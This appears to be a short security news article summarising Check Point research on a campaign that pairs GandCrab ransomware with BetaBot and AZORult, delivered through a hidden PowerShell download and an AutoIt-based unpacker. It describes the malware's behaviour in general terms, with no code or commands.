- The attackers have been observed launching two variants of GandCrab, a variant of BetaBot and a variant of AZORult infostealer malware.
- AZORUlt sample act as a secondary payload in the attack process.
The prolific GandCrab ransomware is back with a set of trojans that are capable of stealing users’ sensitive data. Recently, the ransomware was used along with Vidar info stealer malware to increase the intensity of cyber espionage.
According to researchers from Checkpoint, the latest attacks use Powershell to deliver the first stage of the infection process rather than that for encryption.
“From our observation of the above Forensics Report provided by SandBlast Agent, we can understand that the attack begins by launching a hidden PowerShell window with command line arguments to download a secondary payload from an infected hosting provider. Our analysts have confirmed that the online hosted payload is changing frequently in order to escape detection from hash signature based Anti-Viruses,” said Check Point researchers in a blog post.
The payload is a Base64 encoded bytecode of a portable executable(PE) which was created using Autolt, a freeware automation language for Microsoft Windows. The Autolt acts as an unpacker and downloads additional payloads such as variants of ransomware and trojans.
In this attack, the attackers have been observed launching two variants of GandCrab, a variant of BetaBot and a variant of AZORult infostealer malware as a part of a secondary payload.
The variants of GandCrab ensures that they maintain a persistent over infected machines in the event of a crash, thereby enabling threat actors to earn profits.
The BetaBot sample is the first to run in the attack process. Once executed, the trojan is capable of doing several things including injecting itself into explorer.exe. After injection, it connects with the C2 server and downloads a series of other malicious binaries.
These malicious entities are responsible for gathering information about the machine, looking for analysis and debugging tools on the machine, detecting the virtual machine environment and disabling anti-virus and firewall tools.
AZORUlt sample act as a secondary payload in the attack process. The main characteristics of this malware family include harvesting cryptocurrency wallets, extracting credentials saved in FTP/IM/Email clients and listening to C2 server while remaining dormant.
Check Point’s research team highlights that one of the two variants of GandCrab ransomware can cause the systems to crash and the Windows Error reporting application(werfault.exe) to launch.
Another variant of the ransomware helps the attackers to gain full administrative privilege by encrypting the files on infected systems.
“After detecting the crash of the GandCrab ransomware, a second variant of GandCrab is launched and successfully gains privilege escalation. This is then able to continue the attack of encrypting files and writing ransomware message files. At the time of the attack this variant had not been seen in the wild,” said Check Point researchers.